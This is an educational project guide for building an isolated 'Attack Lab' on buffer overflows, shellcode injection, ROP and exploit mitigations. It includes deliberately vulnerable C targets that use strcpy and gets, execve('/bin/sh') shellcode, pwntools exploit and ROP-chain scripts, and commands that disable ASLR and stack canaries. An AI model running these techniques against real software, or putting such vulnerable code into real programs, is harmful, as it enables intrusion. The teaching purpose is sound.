Project 6: Attack Lab Workflow

Project 6: Attack Lab Workflow

Learn to defend by learning to attack: Build a controlled exploitation lab to master buffer overflows, code injection, and Return-Oriented Programming.


IMPORTANT: Safety and Ethics Disclaimer

This project is strictly for educational purposes in controlled, isolated environments.

This guide teaches exploitation techniques so you can:

  1. Understand vulnerabilities to write more secure code
  2. Recognize attack patterns in code review
  3. Appreciate why mitigations exist and how they work
  4. Prepare for security roles in software development

Legal and Ethical Boundaries:

  • ONLY practice on systems you own or have explicit written permission to test
  • NEVER use these techniques on production systems, networks, or other peopleโ€™s computers
  • Unauthorized computer access is a federal crime (CFAA in the US, similar laws worldwide)
  • Even โ€œharmlessโ€ testing without permission is illegal and unethical
  • This knowledge comes with responsibility: use it to build better defenses

Recommended Environment:

  • Virtual machines (QEMU/VirtualBox) with no network access
  • Docker containers isolated from host
  • Purpose-built vulnerable applications (CMU Attack Lab, DVWA, etc.)
  • Systems with security mitigations explicitly disabled for learning

Quick Reference

Attribute Value
Difficulty Expert
Time Estimate 2-3 weeks
Language C (exploit development), Python (tooling)
Prerequisites Projects 4 and 5 (Calling Convention + Bomb Lab)
Key Topics Buffer overflows, shellcode, ROP, stack layout, mitigations
CS:APP Chapters 3 (Machine-Level Programs)

1. Learning Objectives

By completing this project, you will:

  1. Understand buffer overflow mechanics: Explain exactly how writing past buffer boundaries corrupts memory and hijacks control flow
  2. Map attack surfaces: Identify vulnerable code patterns and calculate exact overwrite distances
  3. Write shellcode: Create minimal machine code payloads that execute when injected
  4. Master ROP techniques: Chain existing code gadgets when code injection is blocked
  5. Reason about mitigations: Explain how ASLR, NX/DEP, stack canaries, and RELRO work and their limitations
  6. Think like an attacker to defend: Apply this knowledge to write secure code and conduct security reviews

2. Theoretical Foundation

2.1 The Buffer Overflow: Fundamental Mechanics

A buffer overflow occurs when a program writes data beyond the boundaries of a buffer, corrupting adjacent memory. On the stack, this can overwrite critical control data.

The Vulnerable Pattern

void vulnerable(char *input) {
    char buffer[64];      // Fixed-size buffer on stack
    strcpy(buffer, input); // No bounds checking!
    // If input > 64 bytes, we overwrite past buffer
}

Stack Layout During Function Call

When vulnerable() is called, the stack looks like this (x86-64, addresses grow downward):

High Addresses
+---------------------------+
|    Caller's Stack Frame   |
+---------------------------+
|     Return Address        |  <- What we want to overwrite!
+---------------------------+
|     Saved RBP             |  <- Previous frame pointer
+---------------------------+
|                           |
|       buffer[64]          |  <- Our buffer (64 bytes)
|                           |
+---------------------------+
|    [More local vars...]   |
+---------------------------+
Low Addresses (RSP points here)

The Overwrite Mechanics

Normal input ("Hello"):
+---------------------------+
| Return Address: 0x401234  |  <- Legitimate return
+---------------------------+
| Saved RBP: 0x7fff1000     |
+---------------------------+
| H | e | l | l | o | \0 |  |  <- buffer[64]
|   [rest of 64 bytes]      |
+---------------------------+

Overflow input (72+ bytes):
+---------------------------+
| Return Address: AAAAAAAA  |  <- OVERWRITTEN with 'AAAA...'
+---------------------------+
| Saved RBP: AAAAAAAA       |  <- OVERWRITTEN
+---------------------------+
| A | A | A | A | A | A | A |  <- buffer filled
| A | A | A | A | A | A | A |
|   [64 bytes of 'A']       |
+---------------------------+

When the function returns, it executes ret, which pops the return address and jumps there. If weโ€™ve overwritten it with an address we control, we hijack execution.

2.2 Calculating the Attack

Key measurements needed:

  1. Buffer location on stack: Where does our input land?
  2. Return address location: How far from buffer start to return address?
  3. Target address: Where do we want to redirect execution?

Finding the offset (using GDB):

# Pattern generation approach
$ python3 -c "print('A'*64 + 'B'*8 + 'C'*8 + 'D'*8)"
# Run under GDB, see what lands in return address

# Alternative: examine stack directly
(gdb) break vulnerable
(gdb) run < input.txt
(gdb) x/32xg $rsp    # Examine 32 quadwords from RSP
(gdb) print &buffer  # Get buffer address
(gdb) info frame     # See return address location

2.3 Code Injection Attacks

When the stack is executable (no NX bit), we can inject machine code directly:

Crafted payload:
+---------------------------+
| Address of buffer         |  <- Return address points to our shellcode
+---------------------------+
| AAAAAAAA (padding)        |  <- Saved RBP (doesn't matter)
+---------------------------+
|  \x48\x31\xc0...          |  <- Shellcode (our machine code)
|  [malicious instructions] |
|  [64 bytes of shellcode]  |
+---------------------------+

Minimal x86-64 shellcode examples:

; Exit with code 42 (minimal shellcode, 10 bytes)
mov eax, 60        ; syscall number for exit (x86-64)
mov edi, 42        ; exit code
syscall

; Bytes: 0xb8 0x3c 0x00 0x00 0x00 0x bf 0x2a 0x00 0x00 0x00 0x0f 0x05
; Spawn /bin/sh (more realistic, ~27 bytes)
xor rdx, rdx          ; envp = NULL
xor rsi, rsi          ; argv = NULL
mov rdi, 0x68732f6e69622f2f  ; "//bin/sh" (reversed for little-endian)
shr rdi, 8            ; Remove extra '/'
push rdi
mov rdi, rsp          ; rdi = pointer to "/bin/sh"
mov al, 59            ; syscall number for execve
syscall

2.4 Return-to-libc and ROP

When the stack is non-executable (NX bit set), we canโ€™t inject code. Instead, we reuse existing code.

Return-to-libc

Jump to library functions already loaded in memory:

Crafted payload:
+---------------------------+
| Address of system()       |  <- Return to system()
+---------------------------+
| AAAAAAAA (padding)        |
+---------------------------+
| buffer contents...        |
+---------------------------+

# With proper setup, this calls system("/bin/sh")

Challenge: On x86-64, arguments are in registers (RDI, RSI, etc.), not stack. We need gadgets to load registers.

Return-Oriented Programming (ROP)

ROP chains together โ€œgadgetsโ€ - small instruction sequences ending in ret:

Gadget: pop rdi; ret
        (found at address 0x401234)

Stack layout for ROP:
+---------------------------+
| addr of: ret              |  <- Chain continues...
+---------------------------+
| addr of: system()         |  <- Return here after pop rdi
+---------------------------+
| addr of: "/bin/sh"        |  <- Popped into RDI
+---------------------------+
| addr of: pop rdi; ret     |  <- First gadget
+---------------------------+
| padding...                |
+---------------------------+
| buffer...                 |
+---------------------------+

Execution flow:

  1. Function returns to pop rdi; ret gadget
  2. pop rdi loads "/bin/sh" address into RDI
  3. ret jumps to system()
  4. system() executes with RDI = "/bin/sh"

2.5 Modern Mitigations

Stack Canaries

A random value placed between buffer and return address:

Stack with canary:
+---------------------------+
| Return Address            |
+---------------------------+
| Saved RBP                 |
+---------------------------+
| CANARY VALUE (random)     |  <- Checked before return
+---------------------------+
| buffer[64]                |
+---------------------------+

How it works:

  • Compiler inserts canary at function entry
  • Before return, checks if canary is unchanged
  • If modified, calls __stack_chk_fail() (aborts)

Compile options:

gcc -fstack-protector        # Protect functions with large arrays
gcc -fstack-protector-all    # Protect all functions
gcc -fno-stack-protector     # Disable (for testing only!)

Limitations:

  • Only protects against sequential overwrites
  • Information leaks can reveal canary value
  • Format string attacks can read/bypass canary

NX/DEP (Non-Executable Stack)

Marks memory pages as either executable or writable, never both:

Virtual Memory with NX:
+---------------------------+
| Stack    [RW-]            |  <- Readable, Writable, NOT Executable
+---------------------------+
| Heap     [RW-]            |  <- Readable, Writable, NOT Executable
+---------------------------+
| Data     [RW-]            |  <- Readable, Writable, NOT Executable
+---------------------------+
| Code     [R-X]            |  <- Readable, NOT Writable, Executable
+---------------------------+

How it works:

  • Hardware enforces via page table NX bit
  • CPU faults if executing from non-executable page
  • Prevents direct code injection

Compile/link options:

gcc -z noexecstack    # Enable NX (default on modern systems)
gcc -z execstack      # Disable NX (for testing only!)

Limitations:

  • Doesnโ€™t prevent code reuse attacks (ROP)
  • Doesnโ€™t protect against data-only attacks
  • JIT compilers need RWX pages (attack target)

ASLR (Address Space Layout Randomization)

Randomizes base addresses of stack, heap, libraries, and (optionally) executable:

Without ASLR (predictable):
  Stack: 0x7ffffffde000
  Heap:  0x555555756000
  libc:  0x7ffff7a00000

With ASLR (randomized each run):
  Run 1:
    Stack: 0x7ffcd4521000
    Heap:  0x55f8a3211000
    libc:  0x7f3c8a100000
  Run 2:
    Stack: 0x7ffc23987000
    Heap:  0x55b9c8765000
    libc:  0x7f1234500000

Types of ASLR:

Component Randomization Enabled By
Stack Yes (default) Kernel
Heap Yes (default) Kernel
Libraries Yes (default) Kernel
Executable (PIE) Compile-time -pie flag

Check ASLR status:

cat /proc/sys/kernel/randomize_va_space
# 0 = disabled
# 1 = partial (stack, heap, libs)
# 2 = full (includes PIE executables)

# Disable temporarily (requires root, testing only!)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Limitations:

  • Information leaks reveal addresses
  • Brute force may be viable on 32-bit (only 8-16 bits of entropy)
  • Some addresses partially predictable (page alignment)
  • Return-to-PLT attacks work without knowing libc base

RELRO (Relocation Read-Only)

Protects the Global Offset Table (GOT) from overwriting:

Partial RELRO (default):
  - Some GOT entries marked read-only after relocation
  - Lazy binding still works (some entries writable)

Full RELRO:
  - All GOT entries resolved at load time
  - Entire GOT marked read-only
  - No lazy binding

Compile options:

gcc -Wl,-z,relro        # Partial RELRO (default)
gcc -Wl,-z,relro,-z,now # Full RELRO

Limitations:

  • Full RELRO increases startup time
  • Doesnโ€™t protect other writable memory
  • Other attack targets exist (malloc hooks, function pointers)

2.6 Attack Taxonomy

                        Buffer Overflow Attacks
                                  โ”‚
         โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
         โ”‚                        โ”‚                        โ”‚
   Code Injection            Code Reuse             Data-Only
   (needs RWX stack)     (bypasses NX/DEP)          Attacks
         โ”‚                        โ”‚                        โ”‚
         โ”‚              โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”              โ”‚
         โ”‚              โ”‚         โ”‚         โ”‚              โ”‚
         โ”‚         ret2libc      ROP    JOP/COP            โ”‚
         โ”‚                        โ”‚                        โ”‚
         โ”‚              โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”              โ”‚
         โ”‚              โ”‚         โ”‚         โ”‚              โ”‚
         โ”‚          Basic ROP  Sigreturn   SROP            โ”‚
         โ”‚                       ROP                       โ”‚
         โ”‚                                                 โ”‚
    Mitigated by:           Mitigated by:           Harder to
    - NX/DEP                - ASLR + PIE            mitigate
    - Stack Canaries        - Stack Canaries        (CFI helps)
                            - CFG/CFI

2.7 Why This Matters for Defense

Understanding attacks enables:

  1. Secure coding practices
    • Always use bounds-checked functions (strncpy, not strcpy)
    • Validate all input lengths
    • Use safe string libraries
  2. Code review for vulnerabilities
    • Recognize dangerous patterns
    • Estimate exploitability
    • Prioritize security fixes
  3. Proper mitigation deployment
    • Enable all compiler protections
    • Understand what each protects against
    • Know the limitations
  4. Incident response
    • Recognize exploitation attempts
    • Understand attack impact
    • Develop containment strategies

3. Project Specification

3.1 What You Will Build

A controlled โ€œAttack Labโ€ environment consisting of:

  1. Vulnerable target programs with intentional security flaws
  2. An exploitation journal documenting your attacks
  3. Proof-of-concept exploits for code injection and ROP
  4. Mitigation analysis showing how each defense affects your attacks

3.2 Functional Requirements

Part 1: Code Injection Attacks

  1. Target 1: Basic Stack Smash
    • Overflow a buffer to redirect execution
    • Call a function that was never intended to be called
    • Document: exact offset, payload structure, why it works
  2. Target 2: Shellcode Injection
    • Inject executable machine code
    • Execute code that performs a visible action (print, file create, etc.)
    • Document: shellcode bytes, how NX is disabled, return address calculation
  3. Target 3: Return Address Overwrite with Constraints
    • Overcome input filtering (e.g., no null bytes, limited character set)
    • Document: how constraints were handled, encoding techniques

Part 2: Return-Oriented Programming

  1. Target 4: Basic ROP Chain
    • With NX enabled, chain gadgets to call a function
    • Document: gadget discovery, chain construction, register setup
  2. Target 5: Multi-Gadget ROP
    • Construct a longer chain performing multiple operations
    • Example: set up registers, call execve equivalent
    • Document: complete chain with annotations

Part 3: Mitigation Analysis

  1. Experiment 1: Stack Canaries
    • Attempt attack with canaries enabled
    • Document crash, canary detection mechanism
    • Discuss bypass techniques (information leak scenarios)
  2. Experiment 2: ASLR
    • Attempt attack with ASLR enabled
    • Document failure mode
    • Discuss bypass techniques (brute force, leaks, ret2plt)
  3. Experiment 3: Full Mitigations
    • Attempt attack with all mitigations
    • Document cumulative defense effect
    • Identify which attacks remain viable

3.3 Non-Functional Requirements

  • Isolation: All work in VM or container with no network
  • Reproducibility: Document all environment setup
  • Evidence-based: Every claim backed by memory dumps, addresses, GDB output
  • Educational focus: Emphasis on understanding, not just โ€œmaking it workโ€

3.4 Example Exploitation Journal Entry

## Attack #2: Shellcode Injection on Target 2

### Environment
- Ubuntu 22.04 x86-64 in VirtualBox (no network)
- ASLR disabled: `echo 0 | sudo tee /proc/sys/kernel/randomize_va_space`
- Compiled: `gcc -g -fno-stack-protector -z execstack -o target2 target2.c`

### Vulnerability Analysis

Target function:
```c
void process_input(char *data) {
    char buffer[128];
    strcpy(buffer, data);  // No bounds check
    printf("Processed: %s\n", buffer);
}

Stack layout (from GDB):

(gdb) break process_input
(gdb) run <<< $(python3 -c "print('A'*200)")
(gdb) x/64xg $rsp

0x7fffffffdc00: 0x4141414141414141  0x4141414141414141  <- buffer starts
...
0x7fffffffdc78: 0x4141414141414141  0x4141414141414141
0x7fffffffdc88: 0x00007fffffffdc90  <- saved RBP (overwritten)
0x7fffffffdc90: 0x00401234abcdef01  <- return address (overwritten)

Offset calculation:

  • buffer @ 0x7fffffffdc00
  • return address @ 0x7fffffffdc90
  • Offset = 144 bytes (128 buffer + 8 saved RBP + 8 return address)

Shellcode Development

Goal: Print โ€œPWNEDโ€ to stdout

; write(1, "PWNED\n", 6)
section .text
global _start
_start:
    mov eax, 1          ; syscall: write
    mov edi, 1          ; fd: stdout
    lea rsi, [rel msg]  ; buffer pointer
    mov edx, 6          ; length
    syscall

    mov eax, 60         ; syscall: exit
    xor edi, edi        ; status: 0
    syscall

msg: db "PWNED", 10

Assembled bytes (25 bytes):

\xb8\x01\x00\x00\x00\xbf\x01\x00\x00\x00\x48\x8d\x35\x0f\x00\x00\x00
\xba\x06\x00\x00\x00\x0f\x05\xb8\x3c\x00\x00\x00\x31\xff\x0f\x05
PWNED\n

Payload Construction

[Shellcode: 25 bytes][NOP sled: 111 bytes][Saved RBP: 8 bytes][Return: buffer addr]

Python payload generator:

import struct

shellcode = b"\xb8\x01\x00\x00\x00..."  # 25 bytes
nop_sled = b"\x90" * 111               # Padding to 136 bytes
saved_rbp = b"BBBBBBBB"                # 8 bytes (overwrites, ignored)
ret_addr = struct.pack("<Q", 0x7fffffffdc00)  # Points to shellcode

payload = shellcode + nop_sled + saved_rbp + ret_addr
print(payload)

Execution Evidence

$ python3 exploit.py | ./target2
PWNED
Segmentation fault (core dumped)  # Expected: shellcode doesn't return cleanly

GDB verification:

(gdb) x/5i 0x7fffffffdc00
   0x7fffffffdc00: mov    eax,0x1
   0x7fffffffdc05: mov    edi,0x1
   ...
(gdb) continue
PWNED

Why It Worked

  1. No bounds checking: strcpy copied entire input without limit
  2. Executable stack: -z execstack disabled NX protection
  3. No ASLR: Stack address predictable across runs
  4. No canary: -fno-stack-protector disabled stack protection

Mitigation Impact

If we enable NX (-z noexecstack):

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffdc00 in ?? ()

CPU faults when trying to execute from stack (non-executable page).

Solution: Use ROP instead of code injection (see Attack #4).


---

## 4. Solution Architecture

### 4.1 Lab Environment Structure

attack-lab/ โ”œโ”€โ”€ environment/ โ”‚ โ”œโ”€โ”€ Dockerfile # Isolated container setup โ”‚ โ”œโ”€โ”€ setup.sh # Disable mitigations for testing โ”‚ โ””โ”€โ”€ reset.sh # Re-enable mitigations โ”œโ”€โ”€ targets/ โ”‚ โ”œโ”€โ”€ target1/ # Basic overflow โ”‚ โ”‚ โ”œโ”€โ”€ target1.c โ”‚ โ”‚ โ”œโ”€โ”€ Makefile โ”‚ โ”‚ โ””โ”€โ”€ README.md โ”‚ โ”œโ”€โ”€ target2/ # Code injection โ”‚ โ”œโ”€โ”€ target3/ # Constrained input โ”‚ โ”œโ”€โ”€ target4/ # Basic ROP โ”‚ โ””โ”€โ”€ target5/ # Advanced ROP โ”œโ”€โ”€ tools/ โ”‚ โ”œโ”€โ”€ gadget_finder.py # Find ROP gadgets โ”‚ โ”œโ”€โ”€ payload_builder.py # Construct exploits โ”‚ โ”œโ”€โ”€ pattern_gen.py # Offset calculation โ”‚ โ””โ”€โ”€ shellcode_gen.py # Shellcode utilities โ”œโ”€โ”€ exploits/ โ”‚ โ”œโ”€โ”€ exploit1.py โ”‚ โ”œโ”€โ”€ exploit2.py โ”‚ โ”œโ”€โ”€ exploit3.py โ”‚ โ”œโ”€โ”€ exploit4.py โ”‚ โ””โ”€โ”€ exploit5.py โ”œโ”€โ”€ journal/ โ”‚ โ”œโ”€โ”€ attack1-basic-overflow.md โ”‚ โ”œโ”€โ”€ attack2-shellcode.md โ”‚ โ”œโ”€โ”€ attack3-constrained.md โ”‚ โ”œโ”€โ”€ attack4-basic-rop.md โ”‚ โ”œโ”€โ”€ attack5-advanced-rop.md โ”‚ โ””โ”€โ”€ mitigation-analysis.md โ””โ”€โ”€ README.md


### 4.2 Key Components

| Component | Purpose | Key Considerations |
|-----------|---------|-------------------|
| Target Programs | Intentionally vulnerable binaries | Multiple difficulty levels |
| Exploit Scripts | Automated payload generation | Reproducible, documented |
| Gadget Finder | Locate ROP gadgets | Works on ELF binaries |
| Pattern Generator | Calculate exact offsets | De Bruijn sequences |
| Journal Entries | Document everything | Evidence-based |

### 4.3 Target Program Designs

**Target 1: Basic Stack Smash**
```c
#include <stdio.h>
#include <string.h>

void win() {
    printf("You called win()! Attack successful.\n");
}

void vulnerable(char *input) {
    char buffer[64];
    strcpy(buffer, input);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable(argv[1]);
    printf("Normal return from main()\n");
    return 0;
}

Target 2: Shellcode Execution

#include <stdio.h>
#include <string.h>

void vulnerable() {
    char buffer[128];
    printf("Enter input: ");
    gets(buffer);  // Extremely dangerous!
    printf("You entered: %s\n", buffer);
}

int main() {
    printf("Shellcode injection target\n");
    vulnerable();
    return 0;
}

Target 4: ROP-Friendly

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// These functions provide gadgets
void setup_rdi(long val) { asm("pop %rdi; ret"); }
void setup_rsi(long val) { asm("pop %rsi; ret"); }

void win_with_args(long a, long b) {
    if (a == 0xdeadbeef && b == 0xcafebabe) {
        printf("ROP chain successful!\n");
        printf("a = 0x%lx, b = 0x%lx\n", a, b);
    }
}

void vulnerable() {
    char buffer[64];
    printf("Input: ");
    gets(buffer);
}

int main() {
    vulnerable();
    return 0;
}

5. Implementation Guide

5.1 Development Environment Setup

Option A: Docker (Recommended)

# Dockerfile
FROM ubuntu:22.04

RUN apt-get update && apt-get install -y \
    gcc \
    gdb \
    python3 \
    python3-pip \
    nasm \
    binutils \
    vim \
    && rm -rf /var/lib/apt/lists/*

# Install pwntools (powerful exploit development library)
RUN pip3 install pwntools

# Disable ASLR in container
RUN echo 0 > /proc/sys/kernel/randomize_va_space || true

WORKDIR /lab
COPY . /lab

CMD ["/bin/bash"]
# Build and run
docker build -t attack-lab .
docker run -it --cap-add=SYS_PTRACE --security-opt seccomp=unconfined attack-lab

Option B: Virtual Machine

# In VM with root access
# Disable ASLR
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

# Install tools
sudo apt install gcc gdb python3 python3-pip nasm binutils
pip3 install pwntools

# Verify setup
cat /proc/sys/kernel/randomize_va_space  # Should print 0

5.2 Implementation Phases

Phase 1: Environment and Basic Overflow (Days 1-4)

Goals:

  • Set up isolated environment
  • Build and test Target 1
  • Achieve first successful attack

Tasks:

  1. Create Docker/VM environment
  2. Write Target 1 (basic_overflow.c)
  3. Compile without protections:
    gcc -g -fno-stack-protector -z execstack -no-pie -o target1 target1.c
    
  4. Find offset using pattern:
    # pattern_gen.py
    from pwn import *
    print(cyclic(200))
    
  5. Craft first exploit:
    # exploit1.py
    from pwn import *
    
    offset = 72  # Found via pattern
    win_addr = 0x401156  # Found via: nm target1 | grep win
    
    payload = b"A" * offset
    payload += p64(win_addr)
    
    print(payload)
    
  6. Document in journal

Checkpoint: ./target1 $(python3 exploit1.py) prints โ€œAttack successful!โ€

Phase 2: Shellcode Development (Days 5-8)

Goals:

  • Write and test shellcode
  • Inject and execute in Target 2
  • Handle input constraints

Tasks:

  1. Write minimal shellcode in NASM:
    ; shellcode.asm
    BITS 64
    global _start
    
    _start:
        ; write(1, msg, 6)
        mov rax, 1
        mov rdi, 1
        lea rsi, [rel msg]
        mov rdx, 6
        syscall
    
        ; exit(0)
        mov rax, 60
        xor rdi, rdi
        syscall
    
    msg: db "PWNED", 10
    
  2. Assemble and extract bytes:
    nasm -f bin shellcode.asm -o shellcode.bin
    xxd -i shellcode.bin
    
  3. Test shellcode standalone:
    // test_shellcode.c
    unsigned char shellcode[] = { 0x48, 0xc7, ... };
    
    int main() {
        void (*func)() = (void(*)())shellcode;
        func();
        return 0;
    }
    
    gcc -z execstack -o test_shellcode test_shellcode.c
    ./test_shellcode  # Should print "PWNED"
    
  4. Build complete exploit for Target 2

  5. Handle Target 3 constraints (if applicable):
    • Alphanumeric shellcode
    • Avoid null bytes
    • Character set restrictions

Checkpoint: Target 2 prints โ€œPWNEDโ€ from injected code

Phase 3: Return-Oriented Programming (Days 9-14)

Goals:

  • Find gadgets in binaries
  • Build ROP chains
  • Execute complex attacks without code injection

Tasks:

  1. Install gadget finder:
    pip3 install ropper
    # Or use ROPgadget
    pip3 install ROPgadget
    
  2. Find gadgets in Target 4:
    ropper --file target4 --search "pop rdi"
    ROPgadget --binary target4 | grep "pop rdi"
    
  3. Build basic ROP chain:
    from pwn import *
    
    # Gadget addresses from ropper
    pop_rdi = 0x401234
    pop_rsi = 0x401236
    win_with_args = 0x401300
    
    payload = b"A" * 72  # Padding to return address
    
    # ROP chain
    payload += p64(pop_rdi)
    payload += p64(0xdeadbeef)  # First argument
    payload += p64(pop_rsi)
    payload += p64(0xcafebabe)  # Second argument
    payload += p64(win_with_args)
    
    print(payload)
    
  4. Develop more complex chains for Target 5

  5. Document gadget discovery and chain logic

Checkpoint: Target 4/5 print โ€œROP chain successful!โ€

Phase 4: Mitigation Analysis (Days 15-18)

Goals:

  • Test attacks against each mitigation
  • Document failure modes
  • Understand defense layers

Tasks:

  1. Recompile targets with individual mitigations:
    # Stack canary only
    gcc -fstack-protector -z execstack -no-pie -o target_canary target.c
    
    # NX only
    gcc -fno-stack-protector -z noexecstack -no-pie -o target_nx target.c
    
    # ASLR (system-wide)
    echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
    
    # Full protection
    gcc -fstack-protector-all -z noexecstack -pie -o target_full target.c
    
  2. Test each exploit against each mitigation

  3. Document:
    • Which attacks succeed/fail
    • Error messages and crash behavior
    • Theoretical bypass techniques (donโ€™t necessarily implement)
  4. Write summary analysis

Checkpoint: Journal documents all mitigation effects

Phase 5: Documentation and Polish (Days 19-21)

Goals:

  • Complete all journal entries
  • Ensure reproducibility
  • Clean up code and tools

Tasks:

  1. Review and complete all journal entries
  2. Verify all exploits still work from scratch
  3. Add setup instructions to README
  4. Create presentation-ready summary
  5. Consider extensions (if time permits)

Final Checkpoint: Another person can replicate your attacks using your documentation


6. Testing Strategy

6.1 Test Categories

Category Purpose Examples
Exploit Verification Confirm attack works Script runs, target behaves as expected
Offset Validation Confirm calculations Pattern crash at expected offset
Shellcode Testing Verify code executes Standalone shellcode test
Mitigation Testing Confirm protection effect Attack fails with specific mitigation

6.2 Critical Tests

Test 1: Offset Calculation Validation

from pwn import *

def find_offset(binary_path):
    """Use pattern to find exact offset."""
    pattern = cyclic(200)
    p = process(binary_path)
    p.sendline(pattern)
    p.wait()

    core = Coredump('./core')
    offset = cyclic_find(core.rip, n=8)
    return offset

Test 2: Shellcode Integrity

# Verify no null bytes (if required)
xxd shellcode.bin | grep " 00 "

# Verify length
wc -c < shellcode.bin

# Test execution
./test_shellcode

Test 3: ROP Gadget Validity

# Verify gadget at address
gdb ./target4
(gdb) x/3i 0x401234
# Should show: pop rdi; ret

Test 4: Mitigation Effect

# Compile with canary
gcc -fstack-protector -o target_canary target.c

# Run exploit (should fail)
./target_canary < payload
# Expected: *** stack smashing detected ***

# Verify in dmesg
dmesg | tail

6.3 Reproducibility Checklist

  • All exploits work from fresh environment
  • ASLR state documented for each test
  • Compiler flags recorded exactly
  • Kernel version noted
  • GDB commands provided for verification
  • Expected output documented

7. Common Pitfalls and Debugging

7.1 Frequent Mistakes

Pitfall Symptom Solution
Wrong architecture Shellcode crashes Verify 32-bit vs 64-bit
ASLR still enabled Addresses differ each run Check /proc/sys/kernel/randomize_va_space
Canary mismatch โ€œStack smashing detectedโ€ Disable with -fno-stack-protector
Bad bytes in payload Input truncated Avoid null bytes, newlines
Wrong endianness Addresses garbled Use p64() for little-endian packing
Stack alignment Crashes in library calls Ensure 16-byte alignment
Missing gadgets Canโ€™t build chain Check linked libraries too

7.2 Debugging Techniques

Memory inspection in GDB:

# Examine stack around buffer
(gdb) x/64xg $rsp

# Watch memory writes
(gdb) watch *(int*)0x7fffffffdc88

# Print registers at crash
(gdb) info registers

# Check memory permissions
(gdb) info proc mappings

Payload debugging:

# Print payload bytes in hex
payload = b"AAAA" + p64(0x401234)
print(payload.hex())
print(hexdump(payload))

# Interactive debugging with pwntools
p = gdb.debug('./target', 'break vulnerable')
p.sendline(payload)
p.interactive()

Shellcode debugging:

# Single-step through shellcode
(gdb) break *0x7fffffffdc00
(gdb) si
(gdb) info registers

7.3 x86-64 Specific Issues

Stack alignment requirement:

x86-64 ABI requires 16-byte stack alignment before CALL
Solution: Add extra "ret" gadget to realign

Red zone:

128 bytes below RSP can be used without adjustment
Leaf functions may use this - shellcode must avoid

PIE complications:

With PIE, all addresses randomized including code
Need leak or partial overwrite to defeat

8. Extensions and Challenges

8.1 Beginner Extensions

  • Shellcode variations: Write shellcode for different syscalls
  • Alphanumeric encoding: Create shellcode using only printable characters
  • Format string auxiliary: Add format string vulnerability exploitation

8.2 Intermediate Extensions

  • ASLR bypass via brute force: Implement on 32-bit target
  • ret2plt attack: Attack without knowing libc base
  • Canary leak: Use format string to leak canary value
  • Heap overflow: Extend to heap-based attacks

8.3 Advanced Extensions

  • SROP (Sigreturn-Oriented Programming): Use sigreturn for powerful primitive
  • JIT-ROP: Exploit JIT engines
  • CFI bypass research: Study Control-Flow Integrity evasion
  • Write-What-Where primitives: Arbitrary memory write exploitation

8.4 CTF Practice

  • Complete CMU Attack Lab officially
  • Solve pwn challenges on picoCTF
  • Practice on pwnable.kr
  • Compete in a live CTF event

9. Real-World Connections

9.1 Historical Significance

Year Event Impact
1988 Morris Worm First major buffer overflow exploit
1996 โ€œSmashing the Stack for Fun and Profitโ€ Aleph Oneโ€™s influential paper
2001 Code Red Worm IIS buffer overflow
2003 SQL Slammer Fastest spreading worm ever
2017 EternalBlue (WannaCry) SMB buffer overflow, billions in damage
2021 Log4Shell Shows memory safety still critical

9.2 Industry Relevance

Roles that use this knowledge:

  • Security Researcher
  • Penetration Tester
  • Vulnerability Analyst
  • Security Engineer (defensive)
  • Compiler/Runtime Developer
  • Operating System Developer

Companies actively hiring:

  • Security firms (CrowdStrike, Palo Alto, Mandiant)
  • Cloud providers (AWS, Google, Microsoft security teams)
  • Hardware vendors (Intel, AMD, ARM security teams)
  • Bug bounty platforms (HackerOne, Bugcrowd)

9.3 Modern Mitigations in Production

Linux kernel protections:
- KASLR (Kernel ASLR)
- SMEP (Supervisor Mode Execution Prevention)
- SMAP (Supervisor Mode Access Prevention)
- kASAN (Kernel Address Sanitizer)

Browser protections:
- Sandboxing (process isolation)
- Site isolation
- CFI (Control-Flow Integrity)
- Memory tagging (MTE on ARM)

Language-level:
- Rust memory safety
- Go bounds checking
- Swift automatic memory management

9.4 Secure Coding Takeaways

From this project, apply these practices:

  1. Never use unsafe functions: strcpy, sprintf, gets -> strncpy, snprintf, fgets
  2. Validate all input lengths: Before copying, check destination size
  3. Enable all compiler protections: -fstack-protector-strong -pie -z relro -z now
  4. Use memory-safe languages when possible: Rust, Go for new code
  5. Defense in depth: Donโ€™t rely on single mitigation
  6. Fuzz testing: Find overflows before attackers do
  7. Code review for patterns: Train to recognize vulnerable code

10. Resources

10.1 Essential Reading

Books:

  • Computer Systems: A Programmerโ€™s Perspective, 3e - Bryant & Oโ€™Hallaron (Chapter 3)
  • Hacking: The Art of Exploitation, 2nd Edition - Jon Erickson
  • The Shellcoderโ€™s Handbook - Chris Anley et al.
  • Practical Binary Analysis - Dennis Andriesse
  • A Bug Hunterโ€™s Diary - Tobias Klein

Papers:

  • โ€œSmashing the Stack for Fun and Profitโ€ - Aleph One (1996)
  • โ€œThe Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Callsโ€ - Shacham (2007)
  • โ€œBlind Return Oriented Programmingโ€ - Bittau et al. (2014)

10.2 Tools

Tool Purpose Link
pwntools Exploit development framework https://github.com/Gallopsled/pwntools
ROPgadget Gadget finder https://github.com/JonathanSalwan/ROPgadget
ropper Advanced gadget finder https://github.com/sashs/Ropper
Ghidra Reverse engineering https://ghidra-sre.org/
radare2 Binary analysis https://rada.re/n/
GEF/pwndbg GDB enhancements https://github.com/hugsy/gef

10.3 Practice Platforms

  • CMU Attack Lab: Official CS:APP lab materials
  • picoCTF: Beginner-friendly CTF with pwn challenges
  • pwnable.kr: Progressive difficulty challenges
  • ROP Emporium: Pure ROP practice
  • Exploit Education: Phoenix, Protostar VMs

